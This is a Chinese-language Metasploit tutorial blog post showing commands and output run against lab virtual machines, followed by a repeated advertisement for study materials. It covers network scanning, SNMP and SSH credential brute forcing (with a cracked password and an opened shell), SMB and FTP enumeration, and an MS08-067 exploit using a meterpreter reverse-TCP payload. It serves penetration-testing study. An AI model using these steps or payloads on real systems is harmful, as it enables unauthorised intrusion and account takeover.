msf5 > db_nmap -sV 192.168.172.130
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST
[*] Nmap: Nmap scan report for 192.168.172.130
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:02:A0:43 (VMware)
[*] Nmap: Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds
auxiliary/scanner/
查看所有模块
msf5 > use auxiliary/scanner [按两次table]
主机发现
发现方式
msf5 > use auxiliary/scanner/discovery/ [按两次table]
use auxiliary/scanner/discovery/arp_sweep use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/empty_udp use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/ipv6_multicast_ping use auxiliary/scanner/discovery/udp_sweep
ARP 主机发现:
msf5 > use auxiliary/scanner/discovery/arp_sweep
# 设置目标ip,表示方式可以为192.168.1.1-192.168.1.20 或 192.168.1.1/24 或 192.168.1.1/24,192.168.2.1/24
#
msf5 auxiliary(scanner/discovery/arp_sweep) > options
# 可以伪造源ip(SHOST)与源MAC(SMAC)
# 设置线程数为20
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf5 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.172.1 appears to be up (VMware, Inc.).
[+] 192.168.172.2 appears to be up (VMware, Inc.).
[+] 192.168.172.130 appears to be up (VMware, Inc.).
[+] 192.168.172.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
查找僵尸机(足够空闲,ipid顺序增长)
msf5 > use auxiliary/scanner/ip/ipidseq
msf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.172.1/24
msf5 auxiliary(scanner/ip/ipidseq) > set ports 80
msf5 auxiliary(scanner/ip/ipidseq) > set threads 20
msf5 auxiliary(scanner/ip/ipidseq) > run
[*] 192.168.172.2's IPID sequence class: Incremental!
[*] Scanned 30 of 256 hosts (11% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.172.130's IPID sequence class: Incremental!
[*] Scanned 129 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
发现了192.168.172.2与192.168.172.130的IPID是递增的,如果他足够空闲(没有与其它主机通信),就可以作为僵尸机代替扫描。
使用nmap 利用僵尸机进行僵尸扫描:
msf5 auxiliary(scanner/ip/ipidseq) > db_nmap -sV -PN -sI 192.168.172.130 192.168.172.133
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 15:12 CST
[*] Nmap: Idle scan using zombie 192.168.172.130 (192.168.172.130:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.172.133
[*] Nmap: Host is up (0.051s latency).
[*] Nmap: Not shown: 986 closed|filtered ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 7/tcp open echo
[*] Nmap: 9/tcp open discard?
[*] Nmap: 13/tcp open daytime?
[*] Nmap: 17/tcp open qotd Windows qotd (English)
[*] Nmap: 19/tcp open chargen
[*] Nmap: 53/tcp open domain?
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1028/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1029/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Service
端口扫描(推荐使用nmap,效率更高)
扫描方式
msf5 > use auxiliary/scanner/portscan/ [按两次table]
use auxiliary/scanner/portscan/ack use auxiliary/scanner/portscan/syn use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/portscan/ftpbounce use auxiliary/scanner/portscan/tcp
syn扫描
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.172.130
msf5 auxiliary(scanner/portscan/syn) > set ports 80
msf5 auxiliary(scanner/portscan/syn) > set threads 50
msf5 auxiliary(scanner/portscan/syn) > run
SNMP扫描
破解
msf5 > use auxiliary/scanner/snmp/snmp_login
msf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10
msf5 auxiliary(scanner/snmp/snmp_login) > run
破解了一个只读权限的账户
[+] 192.168.172.135:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
读取信息
msf5 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum
msf5 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/snmp/snmp_enum) > run
[*] System information:
Host IP : 192.168.172.135
Hostname : bingyi-virtual-machine
Description : Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Contact : Me <me@example.org>
Location : Sitting on the Dock of the Bay
Uptime snmp : 11:18:08.39
Uptime system : 00:06:23.04
System date : 2020-11-9 10:51:42.0
windows:
# 枚举用户信息
use auxiliary/scanner/snmp/snmp_enumusers
# 枚举文件共享信息
use auxiliary/scanner/snmp/snmp_enumshares
SMB扫描
发现
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.172.131:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.172.131:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
扫描命名管道
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/pipe_auditor) > run
枚举共享
msf5 auxiliary(scanner/smb/pipe_auditor) > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/smb/smb_enumshares) > set smbuser msfadmin
msf5 auxiliary(scanner/smb/smb_enumshares) > set smbpass msfadmin
msf5 auxiliary(scanner/smb/smb_enumshares) > run
SSH 扫描
发现
版本扫描,如果是低版本可利用漏洞。
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.172.135:22 - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.8 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.2p2 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=16.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:16.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.172.135:22 - Scanned 1 of 1 hosts (100% complete)
密码爆破
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_login) > set username bingyi
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file ~/Desktop/dic/shhpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set thread 10
msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.172.135:22 - Success: 'bingyi:123' 'uid=1000(bingyi) gid=1000(bingyi) groups=1000(bingyi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.172.129:35897 -> 192.168.172.135:22) at 2020-11-11 13:00:13 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
密钥爆破
msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.172.135
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > show options
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path key.txt
msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run
FTP
版本扫描
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
尝试匿名登录
msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.172.131:21 - 192.168.172.131:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
密码破解
略
Windows利用已获得的shell收集目标缺失补丁
获取shell,将shell注入其它进程
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > run -j
# 进入会话
msf5 exploit(windows/smb/ms08_067_netapi) > session 2
# 显示shell当前所在进程
meterpreter > getpid
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
不知道该从何学起的朋友。**
[外链图片转存中...(img-PL2gzYft-1715568245951)]
[外链图片转存中...(img-Mu9ywh2e-1715568245952)]
[外链图片转存中...(img-R91COMr9-1715568245952)]
[外链图片转存中...(img-wXRR4RDE-1715568245952)]
[外链图片转存中...(img-8vnprESr-1715568245953)]
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
500
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
